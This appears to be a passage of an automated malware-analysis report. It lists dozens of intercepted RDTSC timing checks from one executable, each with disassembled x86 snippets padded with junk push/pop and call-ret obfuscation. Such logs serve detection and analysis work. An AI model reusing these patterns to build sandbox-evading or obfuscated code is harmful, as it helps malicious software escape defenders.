Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D25F6E second address: D25F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5DB7C second address: D5DB85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5DFAC second address: D5DFFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBBCD9554Ch 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jp 00007FFBBCD9554Eh 0x00000012 pushad 0x00000013 jbe 00007FFBBCD95546h 0x00000019 jnl 00007FFBBCD95546h 0x0000001f jno 00007FFBBCD95546h 0x00000025 popad 0x00000026 pushad 0x00000027 push edi 0x00000028 pop edi 0x00000029 jmp 00007FFBBCD95556h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5EF0C second address: D5EF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5EF10 second address: D5EF49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FFBBCD95546h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007FFBBCD9554Dh 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FFBBCD9554Eh 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push edx 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pop edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5F063 second address: D5F067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5FB05 second address: D5FB2A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFBBCD95556h 0x00000008 jmp 00007FFBBCD95550h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jns 00007FFBBCD95546h 0x00000019 pop eax 0x0000001a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5FB2A second address: D5FB30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5FB30 second address: D5FB34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5FCA5 second address: D5FCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D5FCA9 second address: D5FCBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FFBBCD95548h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D60095 second address: D6009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6009B second address: D600A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D600A0 second address: D600AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FFBBCAD7286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6017E second address: D60185 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D60F2B second address: D60F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D60F31 second address: D60F35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D61862 second address: D61866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D62111 second address: D62198 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FFBBCD95546h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FFBBCD95548h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 pushad 0x0000002a pushad 0x0000002b or ecx, 4790F431h 0x00000031 adc ebx, 19D263A6h 0x00000037 popad 0x00000038 mov edx, dword ptr [ebp+122D2A95h] 0x0000003e popad 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ecx 0x00000044 call 00007FFBBCD95548h 0x00000049 pop ecx 0x0000004a mov dword ptr [esp+04h], ecx 0x0000004e add dword ptr [esp+04h], 0000001Ch 0x00000056 inc ecx 0x00000057 push ecx 0x00000058 ret 0x00000059 pop ecx 0x0000005a ret 0x0000005b push 00000000h 0x0000005d push eax 0x0000005e pushad 0x0000005f push esi 0x00000060 jc 00007FFBBCD95546h 0x00000066 pop esi 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007FFBBCD9554Fh 0x0000006e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D62198 second address: D6219C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D63623 second address: D63629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D63629 second address: D6362D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6335E second address: D63376 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FFBBCD9554Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6362D second address: D6363C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6363C second address: D63646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FFBBCD95546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D63646 second address: D6364A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D64BC9 second address: D64BD6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D64BD6 second address: D64BDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D65726 second address: D65730 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFBBCD95546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D65730 second address: D6574A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD728Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jl 00007FFBBCAD728Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6574A second address: D657BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push eax 0x00000009 call 00007FFBBCD95548h 0x0000000e pop eax 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 add dword ptr [esp+04h], 00000015h 0x0000001b inc eax 0x0000001c push eax 0x0000001d ret 0x0000001e pop eax 0x0000001f ret 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FFBBCD95548h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c jns 00007FFBBCD9554Ch 0x00000042 push 00000000h 0x00000044 push eax 0x00000045 pushad 0x00000046 push esi 0x00000047 jc 00007FFBBCD95546h 0x0000004d pop esi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007FFBBCD95559h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D657BF second address: D657C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D65F62 second address: D65F66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6998E second address: D699A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FFBBCAD7293h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D65F66 second address: D65F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6A76B second address: D6A76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6A76F second address: D6A7CA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov bx, 888Ch 0x0000000d push 00000000h 0x0000000f sub dword ptr [ebp+122D31A8h], edx 0x00000015 mov ebx, ecx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FFBBCD95548h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov bh, D8h 0x00000035 xchg eax, esi 0x00000036 pushad 0x00000037 pushad 0x00000038 jmp 00007FFBBCD95555h 0x0000003d jnp 00007FFBBCD95546h 0x00000043 popad 0x00000044 push eax 0x00000045 push edx 0x00000046 push esi 0x00000047 pop esi 0x00000048 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6A7CA second address: D6A7EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007FFBBCAD72A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBBCAD7294h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6A7EE second address: D6A7F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6C827 second address: D6C840 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBBCAD728Bh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6B8D2 second address: D6B8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6C840 second address: D6C844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6B9C0 second address: D6B9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6D928 second address: D6D92D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6CB05 second address: D6CB0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6CB0F second address: D6CB25 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBBCAD7286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FFBBCAD7286h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D6CB25 second address: D6CB3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D71B18 second address: D71BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FFBBCAD7288h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 xor dword ptr [ebp+124771E8h], ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007FFBBCAD7288h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov edi, 6CE78A36h 0x00000049 mov edi, 1281EF04h 0x0000004e push 00000000h 0x00000050 mov ebx, dword ptr [ebp+122D1AC7h] 0x00000056 jp 00007FFBBCAD7289h 0x0000005c xchg eax, esi 0x0000005d jmp 00007FFBBCAD7292h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007FFBBCAD7294h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D75218 second address: D7521C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D7521C second address: D75237 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c mov edi, 096EC600h 0x00000011 push 00000000h 0x00000013 mov bl, dl 0x00000015 xchg eax, esi 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D75237 second address: D7525B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCD95554h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jp 00007FFBBCD95563h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D75464 second address: D75469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D772A6 second address: D772AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D772AA second address: D772B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D782DB second address: D782EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FFBBCD95546h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D782EA second address: D782FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D7741D second address: D77435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFBBCD9554Dh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D782FA second address: D782FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D793AB second address: D793D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jnp 00007FFBBCD95546h 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFBBCD95558h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D793D6 second address: D793FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 add dword ptr [ebp+122D37E1h], eax 0x0000000e push 00000000h 0x00000010 mov ebx, eax 0x00000012 push 00000000h 0x00000014 mov bx, ax 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007FFBBCAD728Bh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D84E05 second address: D84E26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFBBCD95558h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D85252 second address: D85257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D85257 second address: D85273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBBCD95551h 0x00000008 jnc 00007FFBBCD95546h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D88B2F second address: D88B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D88B3F second address: D88B45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D88B45 second address: D88B77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBBCAD7292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push esi 0x00000015 push edx 0x00000016 pop edx 0x00000017 pop esi 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e jno 00007FFBBCAD7286h 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D88B77 second address: D88B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFBBCD95555h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D88C1E second address: D88C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAAA second address: D8BAAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAAE second address: D8BAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAB4 second address: D8BAD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFBBCD95558h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAD0 second address: D8BAE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FFBBCAD7286h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAE2 second address: D8BAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAE6 second address: D8BAEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BAEA second address: D8BB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FFBBCD9554Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BB07 second address: D8BB0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D8BB0B second address: D8BB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007FFBBCD95546h 0x00000011 jp 00007FFBBCD95546h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D1F3A7 second address: D1F3AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D1F3AD second address: D1F3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFBBCD95546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D9071C second address: D90720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\HrIrtCXI3s.exeRDTSC instruction interceptor: First address: D90720 second address: D90732 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBBCD95546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FFBBCD95557h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
